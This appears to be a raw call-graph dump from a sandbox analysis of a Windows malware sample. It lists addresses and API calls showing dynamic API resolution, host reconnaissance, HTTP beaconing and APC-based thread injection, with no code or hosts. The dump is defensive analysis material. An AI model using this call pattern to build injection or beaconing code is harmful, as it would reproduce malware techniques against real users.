1ff4cae0d52 50125->50126 50127 1ff4cadcce0 LdrGetProcedureAddress 50126->50127 50128 1ff4cae0d71 50127->50128 50129 1ff4cadcce0 LdrGetProcedureAddress 50128->50129 50130 1ff4cae0d90 50129->50130 50131 1ff4cadcce0 LdrGetProcedureAddress 50130->50131 50132 1ff4cae0daf 50131->50132 50133 1ff4cadcce0 LdrGetProcedureAddress 50132->50133 50134 1ff4cae0dce 50133->50134 50135 1ff4cadcce0 LdrGetProcedureAddress 50134->50135 50136 1ff4cae0ded 50135->50136 50137 1ff4cadcce0 LdrGetProcedureAddress 50136->50137 50138 1ff4cae0e0c 50137->50138 50139 1ff4cadcce0 LdrGetProcedureAddress 50138->50139 50140 1ff4cae0e2b 50139->50140 50141 1ff4cadcce0 LdrGetProcedureAddress 50140->50141 50141->49940 50144 1ff4cadcd1b 50142->50144 50143 1ff4cadcdbf 50143->49757 50144->50143 50145 1ff4cadcd9b LdrGetProcedureAddress 50144->50145 50145->50143 50146 1ff4cad7bf0 50147 1ff4cad7c06 50146->50147 50163 1ff4cad2930 50147->50163 50149 1ff4cad7c24 50302 1ff4cad8ed0 50149->50302 50151 1ff4cad7d64 50335 1ff4cad7f70 50151->50335 50153 1ff4cad7d8c 50476 1ff4caf4d00 GetUserNameW GetComputerNameExW 50153->50476 50155 1ff4cad7f54 50156 1ff4cad7da4 50156->50155 50508 1ff4cb04740 50156->50508 50159 1ff4cae4700 RtlFreeHeap 50162 1ff4cad7e3b 50159->50162 50161 1ff4cae8c60 CreateFiber DeleteFiber 50161->50162 50162->50155 50162->50159 50162->50161 50512 1ff4cae3d90 8 API calls 50162->50512 50513 1ff4cad8bc0 50162->50513 50562 1ff4cadffe0 50163->50562 50169 1ff4cad2943 50170 1ff4cadf5f5 50169->50170 50171 1ff4cadcce0 LdrGetProcedureAddress 50169->50171 50170->50149 50172 1ff4cadee10 50171->50172 50173 1ff4cadcce0 LdrGetProcedureAddress 50172->50173 50174 1ff4cadee2b 50173->50174 50175 1ff4cadcce0 LdrGetProcedureAddress 50174->50175 50176 1ff4cadee54 50175->50176 50177 1ff4cadcce0 LdrGetProcedureAddress 50176->50177 50178 1ff4cadee73 50177->50178 50179 1ff4cadcce0 LdrGetProcedureAddress 50178->50179 50180 1ff4cadee92 50179->50180 50181 1ff4cadcce0 LdrGetProcedureAddress 50180->50181 50182 1ff4cadeeb1 50181->50182 50183 1ff4cadcce0 LdrGetProcedureAddress 50182->50183 50184 1ff4cadeed0 50183->50184 50185 1ff4cadcce0 LdrGetProcedureAddress 50184->50185 50186 1ff4cadeeef 50185->50186 50187 1ff4cadcce0 LdrGetProcedureAddress 50186->50187 50188 1ff4cadef0e 50187->50188 50189 1ff4cadcce0 LdrGetProcedureAddress 50188->50189 50190 1ff4cadef2d 50189->50190 50191 1ff4cadcce0 LdrGetProcedureAddress 50190->50191 50192 1ff4cadef4c 50191->50192 50193 1ff4cadcce0 LdrGetProcedureAddress 50192->50193 50194 1ff4cadef6b 50193->50194 50195 1ff4cadcce0 LdrGetProcedureAddress 50194->50195 50196 1ff4cadef8a 50195->50196 50197 1ff4cadcce0 LdrGetProcedureAddress 50196->50197 50198 1ff4cadefa9 50197->50198 50199 1ff4cadcce0 LdrGetProcedureAddress 50198->50199 50200 1ff4cadefc8 50199->50200 50201 1ff4cadcce0 LdrGetProcedureAddress 50200->50201 50202 1ff4cadefe7 50201->50202 50203 1ff4cadcce0 LdrGetProcedureAddress 50202->50203 50204 1ff4cadf006 50203->50204 50205 1ff4cadcce0 LdrGetProcedureAddress 50204->50205 50206 1ff4cadf025 50205->50206 50207 1ff4cadcce0 LdrGetProcedureAddress 50206->50207 50208 1ff4cadf044 50207->50208 50209 1ff4cadcce0 LdrGetProcedureAddress 50208->50209 50210 1ff4cadf063 50209->50210 50211 1ff4cadcce0 LdrGetProcedureAddress 50210->50211 50212 1ff4cadf082 50211->50212 50213 1ff4cadcce0 LdrGetProcedureAddress 50212->50213 50214 1ff4cadf0a1 50213->50214 50215 1ff4cadcce0 LdrGetProcedureAddress 50214->50215 50216 1ff4cadf0c0 50215->50216 50217 1ff4cadcce0 LdrGetProcedureAddress 50216->50217 50218 1ff4cadf0df 50217->50218 50219 1ff4cadcce0 LdrGetProcedureAddress 50218->50219 50220 1ff4cadf0fe 50219->50220 50221 1ff4cadcce0 LdrGetProcedureAddress 50220->50221 50222 1ff4cadf11d 50221->50222 50223 1ff4cadcce0 LdrGetProcedureAddress 50222->50223 50224 1ff4cadf13c 50223->50224 50225 1ff4cadcce0 LdrGetProcedureAddress 50224->50225 50226 1ff4cadf15b 50225->50226 50227 1ff4cadcce0 LdrGetProcedureAddress 50226->50227 50228 1ff4cadf17a 50227->50228 50229 1ff4cadcce0 LdrGetProcedureAddress 50228->50229 50230 1ff4cadf199 50229->50230 50231 1ff4cadcce0 LdrGetProcedureAddress 50230->50231 50232 1ff4cadf1b8 50231->50232 50233 1ff4cadcce0 LdrGetProcedureAddress 50232->50233 50234 1ff4cadf1d7 50233->50234 50235 1ff4cadcce0 LdrGetProcedureAddress 50234->50235 50236 1ff4cadf1f6 50235->50236 50237 1ff4cadcce0 LdrGetProcedureAddress 50236->50237 50238 1ff4cadf215 50237->50238 50239 1ff4cadcce0 LdrGetProcedureAddress 50238->50239 50240 1ff4cadf234 50239->50240 50241 1ff4cadcce0 LdrGetProcedureAddress 50240->50241 50242 1ff4cadf253 50241->50242 50243 1ff4cadcce0 LdrGetProcedureAddress 50242->50243 50244 1ff4cadf272 50243->50244 50245 1ff4cadcce0 LdrGetProcedureAddress 50244->50245 50246 1ff4cadf291 50245->50246 50247 1ff4cadcce0 LdrGetProcedureAddress 50246->50247 50248 1ff4cadf2b0 50247->50248 50249 1ff4cadcce0 LdrGetProcedureAddress 50248->50249 50250 1ff4cadf2cf 50249->50250 50251 1ff4cadcce0 LdrGetProcedureAddress 50250->50251 50252 1ff4cadf2ee 50251->50252 50253 1ff4cadcce0 LdrGetProcedureAddress 50252->50253 50254 1ff4cadf30d 50253->50254 50255 1ff4cadcce0 LdrGetProcedureAddress 50254->50255 50256 1ff4cadf32c 50255->50256 50257 1ff4cadcce0 LdrGetProcedureAddress 50256->50257 50258 1ff4cadf34b 50257->50258 50259 1ff4cadcce0 LdrGetProcedureAddress 50258->50259 50260 1ff4cadf36a 50259->50260 50261 1ff4cadcce0 LdrGetProcedureAddress 50260->50261 50262 1ff4cadf389 50261->50262 50263 1ff4cadcce0 LdrGetProcedureAddress 50262->50263 50264 1ff4cadf3a8 50263->50264 50265 1ff4cadcce0 LdrGetProcedureAddress 50264->50265 50266 1ff4cadf3c7 50265->50266 50267 1ff4cadcce0 LdrGetProcedureAddress 50266->50267 50268 1ff4cadf3e6 50267->50268 50269 1ff4cadcce0 LdrGetProcedureAddress 50268->50269 50270 1ff4cadf405 50269->50270 50271 1ff4cadcce0 LdrGetProcedureAddress 50270->50271 50272 1ff4cadf424 50271->50272 50273 1ff4cadcce0 LdrGetProcedureAddress 50272->50273 50274 1ff4cadf443 50273->50274 50275 1ff4cadcce0 LdrGetProcedureAddress 50274->50275 50276 1ff4cadf462 50275->50276 50277 1ff4cadcce0 LdrGetProcedureAddress 50276->50277 50278 1ff4cadf481 50277->50278 50279 1ff4cadcce0 LdrGetProcedureAddress 50278->50279 50280 1ff4cadf4a0 50279->50280 50281 1ff4cadcce0 LdrGetProcedureAddress 50280->50281 50282 1ff4cadf4bf 50281->50282 50283 1ff4cadcce0 LdrGetProcedureAddress 50282->50283 50284 1ff4cadf4de 50283->50284 50285 1ff4cadcce0 LdrGetProcedureAddress 50284->50285 50286 1ff4cadf4fd 50285->50286 50287 1ff4cadcce0 LdrGetProcedureAddress 50286->50287 50288 1ff4cadf51c 50287->50288 50289 1ff4cadcce0 LdrGetProcedureAddress 50288->50289 50290 1ff4cadf53b 50289->50290 50291 1ff4cadcce0 LdrGetProcedureAddress 50290->50291 50292 1ff4cadf55a 50291->50292 50293 1ff4cadcce0 LdrGetProcedureAddress 50292->50293 50294 1ff4cadf579 50293->50294 50295 1ff4cadcce0 LdrGetProcedureAddress 50294->50295 50296 1ff4cadf598 50295->50296 50297 1ff4cadcce0 LdrGetProcedureAddress 50296->50297 50298 1ff4cadf5b7 50297->50298 50299 1ff4cadcce0 LdrGetProcedureAddress 50298->50299 50300 1ff4cadf5d6 50299->50300 50301 1ff4cadcce0 LdrGetProcedureAddress 50300->50301 50301->50170 50634 1ff4caf4ce0 50302->50634 50307 1ff4cb03de0 RtlFreeHeap 50308 1ff4cad90af 50307->50308 50309 1ff4cb03de0 RtlFreeHeap 50308->50309 50310 1ff4cad9110 50309->50310 50311 1ff4cb03de0 RtlFreeHeap 50310->50311 50312 1ff4cad916c 50311->50312 50313 1ff4cb03de0 RtlFreeHeap 50312->50313 50314 1ff4cad91a1 50313->50314 50315 1ff4cb03de0 RtlFreeHeap 50314->50315 50316 1ff4cad91f1 50315->50316 50317 1ff4cb03de0 RtlFreeHeap 50316->50317 50318 1ff4cad9222 50317->50318 50319 1ff4cb03de0 RtlFreeHeap 50318->50319 50320 1ff4cad925a 50319->50320 50321 1ff4cb03de0 RtlFreeHeap 50320->50321 50322 1ff4cad92af 50321->50322 50323 1ff4cb03de0 RtlFreeHeap 50322->50323 50324 1ff4cad92f1 50323->50324 50325 1ff4cb03de0 RtlFreeHeap 50324->50325 50326 1ff4cad9333 50325->50326 50327 1ff4cb03de0 RtlFreeHeap 50326->50327 50328 1ff4cad9347 50327->50328 50329 1ff4cb03de0 RtlFreeHeap 50328->50329 50330 1ff4cad9362 50329->50330 50331 1ff4cb03de0 RtlFreeHeap 50330->50331 50332 1ff4cad938e 50331->50332 50333 1ff4cb03de0 RtlFreeHeap 50332->50333 50334 1ff4cad93c1 50333->50334 50334->50151 50336 1ff4cad7fb8 50335->50336 50337 1ff4cad7f99 50335->50337 50338 1ff4cad7fda 50336->50338 50340 1ff4cb03de0 RtlFreeHeap 50336->50340 50339 1ff4cb03de0 RtlFreeHeap 50337->50339 50640 1ff4caf5560 50338->50640 50339->50336 50340->50338 50344 1ff4caf5560 RtlFreeHeap 50348 1ff4cad8066 50344->50348 50345 1ff4cad802a 50345->50344 50346 1ff4cad8088 50347 1ff4caf5560 RtlFreeHeap 50346->50347 50352 1ff4cad809c 50347->50352 50348->50346 50349 1ff4cafb4e0 RtlFreeHeap 50348->50349 50349->50346 50350 1ff4cad80be 50351 1ff4caf5560 RtlFreeHeap 50350->50351 50356 1ff4cad80d2 50351->50356 50352->50350 50353 1ff4cafb4e0 RtlFreeHeap 50352->50353 50353->50350 50354 1ff4cad80f4 50355 1ff4caf5560 RtlFreeHeap 50354->50355 50360 1ff4cad8108 50355->50360 50356->50354 50357 1ff4cafb4e0 RtlFreeHeap 50356->50357 50357->50354 50358 1ff4cad812a 50359 1ff4caf5560 RtlFreeHeap 50358->50359 50364 1ff4cad813e 50359->50364 50360->50358 50361 1ff4cafb4e0 RtlFreeHeap 50360->50361 50361->50358 50362 1ff4cad8160 50363 1ff4caf5560 RtlFreeHeap 50362->50363 50368 1ff4cad8174 50363->50368 50364->50362 50365 1ff4cafb4e0 RtlFreeHeap 50364->50365 50365->50362 50366 1ff4cad8197 50367 1ff4caf5560 RtlFreeHeap 50366->50367 50373 1ff4cad81ab 50367->50373 50368->50366 50369 1ff4cafb4e0 RtlFreeHeap 50368->50369 50369->50366 50370 1ff4cad81d4 50371 1ff4caf5560 RtlFreeHeap 50370->50371 50372 1ff4cad81e8 50371->50372 50374 1ff4cad823d 50372->50374 50376 1ff4caebe20 RtlFreeHeap 50372->50376 50373->50370 50375 1ff4cafb4e0 RtlFreeHeap 50373->50375 50377 1ff4caf5560 RtlFreeHeap 50374->50377 50375->50370 50378 1ff4cad8214 50376->50378 50383 1ff4cad8251 50377->50383 50381 1ff4cafb4e0 RtlFreeHeap 50378->50381 50379 1ff4cad838a 50380 1ff4caf5560 RtlFreeHeap 50379->50380 50382 1ff4cad839e 50380->50382 50384 1ff4cad8235 50381->50384 50385 1ff4caf5560 RtlFreeHeap 50382->50385 50383->50379 50391 1ff4cad8322 50383->50391 50648 1ff4cada050 RtlFreeHeap 50383->50648 50386 1ff4cafb4e0 RtlFreeHeap 50384->50386 50398 1ff4cad83ba 50385->50398 50386->50374 50387 1ff4cad8430 50388 1ff4caf5560 RtlFreeHeap 50387->50388 50389 1ff4cad8444 50388->50389 50390 1ff4cad846d 50389->50390 50393 1ff4caebe20 RtlFreeHeap 50389->50393 50397 1ff4caf5560 RtlFreeHeap 50390->50397 50392 1ff4cad835d 50391->50392 50649 1ff4cada050 RtlFreeHeap 50391->50649 50395 1ff4cafb4e0 RtlFreeHeap 50392->50395 50396 1ff4cad8460 50393->50396 50399 1ff4cad837d 50395->50399 50400 1ff4cafb4e0 RtlFreeHeap 50396->50400 50402 1ff4cad848e 50397->50402 50398->50387 50403 1ff4cafb4e0 RtlFreeHeap 50398->50403 50464 1ff4cad8b86 50398->50464 50404 1ff4cafb4e0 RtlFreeHeap 50399->50404 50400->50390 50405 1ff4cad84b7 50402->50405 50407 1ff4caebe20 RtlFreeHeap 50402->50407 50406 1ff4cad8423 50403->50406 50404->50379 50409 1ff4caf5560 RtlFreeHeap 50405->50409 50408 1ff4cafb4e0 RtlFreeHeap 50406->50408 50410 1ff4cad84aa 50407->50410 50408->50387 50411 1ff4cad84d8 50409->50411 50412 1ff4cafb4e0 RtlFreeHeap 50410->50412 50413 1ff4cad8501 50411->50413 50414 1ff4caebe20 RtlFreeHeap 50411->50414 50412->50405 50416 1ff4caf5560 RtlFreeHeap 50413->50416 50415 1ff4cad84f4 50414->50415 50417 1ff4cafb4e0 RtlFreeHeap 50415->50417 50418 1ff4cad8522 50416->50418 50417->50413 50419 1ff4cad854b 50418->50419 50420 1ff4caebe20 RtlFreeHeap 50418->50420 50421 1ff4caf5560 RtlFreeHeap 50419->50421 50422 1ff4cad853e 50420->50422 50423 1ff4cad856c 50421->50423 50424 1ff4cafb4e0 RtlFreeHeap 50422->50424 50425 1ff4cad8595 50423->50425 50426 1ff4caebe20 RtlFreeHeap 50423->50426 50424->50419 50428 1ff4caf5560 RtlFreeHeap 50425->50428 50427 1ff4cad8588 50426->50427 50429 1ff4cafb4e0 RtlFreeHeap 50427->50429 50430 1ff4cad85b6 50428->50430 50429->50425 50431 1ff4caf5560 RtlFreeHeap 50430->50431 50432 1ff4cad85d2 50431->50432 50433 1ff4cafb4e0 RtlFreeHeap 50432->50433 50432->50464 50434 1ff4cad8625 50433->50434 50435 1ff4cafb4e0 RtlFreeHeap 50434->50435 50436 1ff4cad865e 50435->50436 50437 1ff4caf5560 RtlFreeHeap 50436->50437 50438 1ff4cad8672 50437->50438 50439 1ff4cafb4e0 RtlFreeHeap 50438->50439 50438->50464 50440 1ff4cad8797 50439->50440 50441 1ff4cafb4e0 RtlFreeHeap 50440->50441 50442 1ff4cad87a4 50441->50442 50443 1ff4caf5560 RtlFreeHeap 50442->50443 50444 1ff4cad87b8 50443->50444 50445 1ff4cafb4e0 RtlFreeHeap 50444->50445 50444->50464 50446 1ff4cad87ec 50445->50446 50447 1ff4caf5560 RtlFreeHeap 50446->50447 50448 1ff4cad8800 50447->50448 50449 1ff4cafb4e0 RtlFreeHeap 50448->50449 50448->50464 50450 1ff4cad882d 50449->50450 50451 1ff4caf5560 RtlFreeHeap 50450->50451 50452 1ff4cad8841 50451->50452 50453 1ff4caf5560 RtlFreeHeap 50452->50453 50454 1ff4cad885d 50453->50454 50455 1ff4cafb4e0 RtlFreeHeap 50454->50455 50454->50464 50456 1ff4cad8897 50455->50456 50457 1ff4caf5560 RtlFreeHeap 50456->50457 50460 1ff4cad88ab 50457->50460 50458 1ff4cafb4e0 RtlFreeHeap 50459 1ff4cad89c8 50458->50459 50461 1ff4cafb4e0 RtlFreeHeap 50459->50461 50460->50458 50460->50464 50462 1ff4cad89d5 50461->50462 50463 1ff4caf5560 RtlFreeHeap 50462->50463 50473 1ff4cad89eb 50463->50473 50464->50153 50465 1ff4cad8aec 50470 1ff4caebe20 RtlFreeHeap 50465->50470 50475 1ff4cad8b47 50465->50475 50466 1ff4cafb4e0 RtlFreeHeap 50468 1ff4cad8b79 50466->50468 50467 1ff4caebe20 RtlFreeHeap 50467->50473 50469 1ff4cafb4e0 RtlFreeHeap 50468->50469 50469->50464 50471 1ff4cad8b2a 50470->50471 50474 1ff4cafb4e0 RtlFreeHeap 50471->50474 50472 1ff4cafb4e0 RtlFreeHeap 50472->50473 50473->50464 50473->50465 50473->50467 50473->50472 50474->50475 50475->50466 50477 1ff4caf4dc7 GetComputerNameExW 50476->50477 50478 1ff4caf4db1 50476->50478 50479 1ff4caf4def 50477->50479 50478->50477 50480 1ff4caf4df3 GetTokenInformation 50479->50480 50485 1ff4caf4e4e 50479->50485 50481 1ff4caf4e1c 50480->50481 50480->50485 50482 1ff4caf4e3e 50481->50482 50483 1ff4cb03de0 RtlFreeHeap 50481->50483 50484 1ff4cb03de0 RtlFreeHeap 50482->50484 50483->50482 50484->50485 50486 1ff4caedfc0 RtlFreeHeap 50485->50486 50487 1ff4caf4e90 50486->50487 50488 1ff4caf4eaa GetNativeSystemInfo 50487->50488 50489 1ff4cb03de0 RtlFreeHeap 50487->50489 50490 1ff4caf4ee8 50488->50490 50491 1ff4caf4ed3 50488->50491 50489->50488 50490->50491 50492 1ff4caf4f17 50490->50492 50494 1ff4cb03de0 RtlFreeHeap 50491->50494 50493 1ff4cb03de0 RtlFreeHeap 50492->50493 50495 1ff4caf4f15 50493->50495 50494->50495 50497 1ff4cb03de0 RtlFreeHeap 50495->50497 50501 1ff4caf4f67 50495->50501 50496 1ff4caf4f8f GetAdaptersInfo 50498 1ff4caf4fdd 50496->50498 50499 1ff4caf4fbb 50496->50499 50497->50501 50498->50499 50504 1ff4caf4fea GetAdaptersInfo 50498->50504 50500 1ff4cafb4e0 RtlFreeHeap 50499->50500 50502 1ff4caf4fc5 50500->50502 50501->50496 50503 1ff4cafb4e0 RtlFreeHeap 50502->50503 50505 1ff4caf4fcd 50503->50505 50504->50499 50506 1ff4caf4fff 50504->50506 50505->50156 50506->50499 50507 1ff4cb03de0 RtlFreeHeap 50506->50507 50507->50506 50510 1ff4cb04759 50508->50510 50509 1ff4cb047af 50509->50162 50510->50509 50511 1ff4cb047ad NtFreeVirtualMemory 50510->50511 50511->50509 50512->50162 50514 1ff4cad8bde 50513->50514 50650 1ff4cada050 RtlFreeHeap 50514->50650 50516 1ff4cad8c5e 50651 1ff4cada050 RtlFreeHeap 50516->50651 50518 1ff4cad8c97 50519 1ff4cafb4e0 RtlFreeHeap 50518->50519 50520 1ff4cad8cee 50519->50520 50521 1ff4cad8d5c 50520->50521 50523 1ff4cad8d5e 50520->50523 50524 1ff4cad8d44 50520->50524 50526 1ff4cad8d8b 50521->50526 50688 1ff4cada050 RtlFreeHeap 50521->50688 50687 1ff4cada050 RtlFreeHeap 50523->50687 50524->50521 50686 1ff4cada050 RtlFreeHeap 50524->50686 50528 1ff4cafb4e0 RtlFreeHeap 50526->50528 50529 1ff4cad8d93 50528->50529 50530 1ff4cafb4e0 RtlFreeHeap 50529->50530 50531 1ff4cad8d9b 50530->50531 50532 1ff4cad8de9 50531->50532 50533 1ff4cad8df0 50531->50533 50689 1ff4cae6fa0 LdrGetProcedureAddress RtlFreeHeap 50532->50689 50652 1ff4cad7830 50533->50652 50536 1ff4cad8dee 50537 1ff4cad8e8e 50536->50537 50538 1ff4caebe20 RtlFreeHeap 50536->50538 50675 1ff4cad17b0 50537->50675 50540 1ff4cad8e23 50538->50540 50542 1ff4cad8e2a 50540->50542 50548 1ff4cad8e34 50540->50548 50541 1ff4cad8e32 50543 1ff4cafb4e0 RtlFreeHeap 50541->50543 50544 1ff4cafb4e0 RtlFreeHeap 50542->50544 50545 1ff4cad8ea4 50543->50545 50544->50541 50546 1ff4cafb4e0 RtlFreeHeap 50545->50546 50547 1ff4cad8eac 50546->50547 50549 1ff4cafb4e0 RtlFreeHeap 50547->50549 50550 1ff4cafb4e0 RtlFreeHeap 50548->50550 50551 1ff4cad8eb4 50549->50551 50552 1ff4cad8e5f 50550->50552 50553 1ff4cafb4e0 RtlFreeHeap 50551->50553 50690 1ff4cada050 RtlFreeHeap 50552->50690 50555 1ff4cad8ebc 50553->50555 50555->50162 50556 1ff4cad8e71 50557 1ff4cafb4e0 RtlFreeHeap 50556->50557 50558 1ff4cad8e79 50557->50558 50691 1ff4caf51d0 RtlFreeHeap 50558->50691 50560 1ff4cad8e86 50561 1ff4cafb4e0 RtlFreeHeap 50560->50561 50561->50537 50564 1ff4cadfff9 50562->50564 50563 1ff4cad2939 50582 1ff4cadf8a0 50563->50582 50564->50563 50565 1ff4cadcce0 LdrGetProcedureAddress 50564->50565 50566 1ff4cae0072 50565->50566 50567 1ff4cadcce0 LdrGetProcedureAddress 50566->50567 50568 1ff4cae008d 50567->50568 50569 1ff4cadcce0 LdrGetProcedureAddress 50568->50569 50570 1ff4cae00b6 50569->50570 50571 1ff4cadcce0 LdrGetProcedureAddress 50570->50571 50572 1ff4cae00d5 50571->50572 50573 1ff4cadcce0 LdrGetProcedureAddress 50572->50573 50574 1ff4cae00f4 50573->50574 50575 1ff4cadcce0 LdrGetProcedureAddress 50574->50575 50576 1ff4cae0113 50575->50576 50577 1ff4cadcce0 LdrGetProcedureAddress 50576->50577 50578 1ff4cae0132 50577->50578 50579 1ff4cadcce0 LdrGetProcedureAddress 50578->50579 50580 1ff4cae0151 50579->50580 50581 1ff4cadcce0 LdrGetProcedureAddress 50580->50581 50581->50563 50583 1ff4cadf8da 50582->50583 50584 1ff4cadcce0 LdrGetProcedureAddress 50583->50584 50589 1ff4cad293e 50583->50589 50585 1ff4cadf900 50584->50585 50586 1ff4cadcce0 LdrGetProcedureAddress 50585->50586 50587 1ff4cadf91b 50586->50587 50588 1ff4cadcce0 LdrGetProcedureAddress 50587->50588 50588->50589 50590 1ff4cae3470 50589->50590 50592 1ff4cae3489 50590->50592 50591 1ff4cae3493 50591->50169 50592->50591 50593 1ff4cadcce0 LdrGetProcedureAddress 50592->50593 50594 1ff4cae3502 50593->50594 50595 1ff4cadcce0 LdrGetProcedureAddress 50594->50595 50596 1ff4cae351d 50595->50596 50597 1ff4cadcce0 LdrGetProcedureAddress 50596->50597 50598 1ff4cae3546 50597->50598 50599 1ff4cadcce0 LdrGetProcedureAddress 50598->50599 50600 1ff4cae3565 50599->50600 50601 1ff4cadcce0 LdrGetProcedureAddress 50600->50601 50602 1ff4cae3584 50601->50602 50603 1ff4cadcce0 LdrGetProcedureAddress 50602->50603 50604 1ff4cae35a3 50603->50604 50605 1ff4cadcce0 LdrGetProcedureAddress 50604->50605 50606 1ff4cae35c2 50605->50606 50607 1ff4cadcce0 LdrGetProcedureAddress 50606->50607 50608 1ff4cae35e1 50607->50608 50609 1ff4cadcce0 LdrGetProcedureAddress 50608->50609 50610 1ff4cae3600 50609->50610 50611 1ff4cadcce0 LdrGetProcedureAddress 50610->50611 50612 1ff4cae361f 50611->50612 50613 1ff4cadcce0 LdrGetProcedureAddress 50612->50613 50614 1ff4cae363e 50613->50614 50615 1ff4cadcce0 LdrGetProcedureAddress 50614->50615 50616 1ff4cae365d 50615->50616 50617 1ff4cadcce0 LdrGetProcedureAddress 50616->50617 50618 1ff4cae367c 50617->50618 50619 1ff4cadcce0 LdrGetProcedureAddress 50618->50619 50620 1ff4cae369b 50619->50620 50621 1ff4cadcce0 LdrGetProcedureAddress 50620->50621 50622 1ff4cae36ba 50621->50622 50623 1ff4cadcce0 LdrGetProcedureAddress 50622->50623 50624 1ff4cae36d9 50623->50624 50625 1ff4cadcce0 LdrGetProcedureAddress 50624->50625 50626 1ff4cae36f8 50625->50626 50627 1ff4cadcce0 LdrGetProcedureAddress 50626->50627 50628 1ff4cae3717 50627->50628 50629 1ff4cadcce0 LdrGetProcedureAddress 50628->50629 50630 1ff4cae3736 50629->50630 50631 1ff4cadcce0 LdrGetProcedureAddress 50630->50631 50632 1ff4cae3755 50631->50632 50633 1ff4cadcce0 LdrGetProcedureAddress 50632->50633 50633->50591 50635 1ff4cad8eee CreateMutexExA 50634->50635 50636 1ff4cb03de0 50635->50636 50638 1ff4cb03e14 50636->50638 50637 1ff4cad8f71 50637->50307 50638->50637 50639 1ff4cafb4e0 RtlFreeHeap 50638->50639 50639->50638 50641 1ff4caf557b 50640->50641 50642 1ff4cad8016 50640->50642 50641->50642 50643 1ff4cafb4e0 RtlFreeHeap 50641->50643 50642->50345 50644 1ff4caebe20 50642->50644 50643->50642 50645 1ff4caebe5c 50644->50645 50646 1ff4caebea5 50645->50646 50647 1ff4cafb4e0 RtlFreeHeap 50645->50647 50646->50345 50647->50646 50648->50383 50649->50392 50650->50516 50651->50518 50653 1ff4cad788a InternetOpenW 50652->50653 50654 1ff4cad7885 50652->50654 50655 1ff4cad7898 InternetConnectW 50653->50655 50673 1ff4cad7aed 50653->50673 50654->50653 50656 1ff4cad78dd HttpOpenRequestW 50655->50656 50655->50673 50659 1ff4cad7931 50656->50659 50656->50673 50657 1ff4cad7b0e InternetCloseHandle 50660 1ff4cad7b17 50657->50660 50658 1ff4cad7b60 50658->50536 50661 1ff4cad79cb HttpSendRequestA 50659->50661 50659->50673 50660->50658 50662 1ff4cad7b56 50660->50662 50664 1ff4cad7b8c 50660->50664 50663 1ff4cad79e4 50661->50663 50661->50673 50662->50658 50665 1ff4cafb4e0 RtlFreeHeap 50662->50665 50669 1ff4cafb4e0 RtlFreeHeap 50663->50669 50674 1ff4cad7a24 50663->50674 50692 1ff4cada050 RtlFreeHeap 50664->50692 50665->50658 50667 1ff4cad7ba4 50668 1ff4cafb4e0 RtlFreeHeap 50667->50668 50668->50658 50669->50674 50670 1ff4cad7a3f InternetQueryDataAvailable 50671 1ff4cad7ae3 50670->50671 50670->50674 50672 1ff4cafb4e0 RtlFreeHeap 50671->50672 50672->50673 50673->50657 50673->50660 50674->50670 50674->50671 50685 1ff4cad17f5 50675->50685 50676 1ff4cad180f 50677 1ff4cafb4e0 RtlFreeHeap 50676->50677 50678 1ff4cad1820 50677->50678 50679 1ff4cafb4e0 RtlFreeHeap 50678->50679 50681 1ff4cad1838 50679->50681 50680 1ff4cafb4e0 RtlFreeHeap 50680->50681 50681->50680 50683 1ff4cad1b61 50681->50683 50698 1ff4cada050 RtlFreeHeap 50681->50698 50683->50541 50685->50676 50693 1ff4cad4cd0 50685->50693 50686->50521 50687->50521 50688->50526 50689->50536 50690->50556 50691->50560 50692->50667 50694 1ff4cb04360 NtCreateThreadEx 50693->50694 50695 1ff4cad4d3d 50694->50695 50696 1ff4cb04ff0 NtQueueApcThread 50695->50696 50697 1ff4cad4d58 50696->50697 50697->50685 50698->50681 49660 1ff4cae55c0 49667 1ff4cae5609 49660->49667 49665 1ff4cae6177 49666 1ff4cae5eed 49726 1ff4cae8620 RtlFreeHeap 49666->49726 49667->49666 49700 1ff4cb04360 49667->49700 49668 1ff4cae57d1 49668->49666 49708 1ff4caef3a0 49668->49708 49673 1ff4cb04ff0 NtQueueApcThread 49674 1ff4cae5eb0 49673->49674 49674->49666 49675 1ff4cae5ec5 49674->49675 49676 1ff4cb04ff0 NtQueueApcThread 49674->49676 49675->49666 49677 1ff4cb04ff0 NtQueueApcThread 49675->49677 49678 1ff4cae5f0e 49676->49678 49679 1ff4cae5ee9 49677->49679 49678->49666 49680 1ff4cb04ff0 NtQueueApcThread 49678->49680 49679->49666 49681 1ff4cb04ff0 NtQueueApcThread 49679->49681 49680->49675 49682 1ff4cae5f67 49681->49682 49682->49666 49683 1ff4cb04ff0 NtQueueApcThread 49682->49683 49684 1ff4cae5f93 49683->49684 49684->49666 49685 1ff4cb04ff0 NtQueueApcThread 49684->49685 49686 1ff4cae5fbf 49685->49686 49686->49666 49687 1ff4cae5fd4 49686->49687 49689 1ff4cb04ff0 NtQueueApcThread 49686->49689 49687->49666 49688 1ff4cb04ff0 NtQueueApcThread 49687->49688 49690 1ff4cae5ff8 49688->49690 49689->49687 49690->49666 49691 1ff4cae6033 49690->49691 49693 1ff4cb04ff0 NtQueueApcThread 49690->49693 49691->49666 49692 1ff4cb04ff0 NtQueueApcThread 49691->49692 49694 1ff4cae6057 49692->49694 49693->49691 49694->49666 49695 1ff4cb04ff0 NtQueueApcThread 49694->49695 49696 1ff4cae60a9 49695->49696 49696->49666 49697 1ff4cb04ff0 NtQueueApcThread 49696->49697 49698 1ff4cae60d5 49697->49698 49698->49666 49725 1ff4cb03a40 NtProtectVirtualMemory 49698->49725 49702 1ff4cb043bd 49700->49702 49701 1ff4cae5795 49701->49666 49704 1ff4cb045f0 49701->49704 49702->49701 49703 1ff4cb0444e NtCreateThreadEx 49702->49703 49703->49701 49706 1ff4cb04621 49704->49706 49705 1ff4cb04686 49705->49668 49706->49705 49707 1ff4cb04684 NtDuplicateObject 49706->49707 49707->49705 49709 1ff4caef3bd 49708->49709 49710 1ff4caef3f2 CreateToolhelp32Snapshot 49709->49710 49711 1ff4caef418 Thread32First 49710->49711 49712 1ff4caef610 49710->49712 49711->49712 49719 1ff4caef439 49711->49719 49713 1ff4cafb4e0 RtlFreeHeap 49712->49713 49715 1ff4caef61c 49713->49715 49714 1ff4caef5fc Thread32Next 49714->49712 49714->49719 49716 1ff4cae5871 49715->49716 49717 1ff4cafb4e0 RtlFreeHeap 49715->49717 49716->49666 49721 1ff4cb04ff0 49716->49721 49717->49716 49719->49714 49720 1ff4caef5fa NtResumeThread 49719->49720 49727 1ff4cb051c0 49719->49727 49720->49714 49722 1ff4cb05011 49721->49722 49723 1ff4cae5e84 49722->49723 49724 1ff4cb0506a NtQueueApcThread 49722->49724 49723->49666 49723->49673 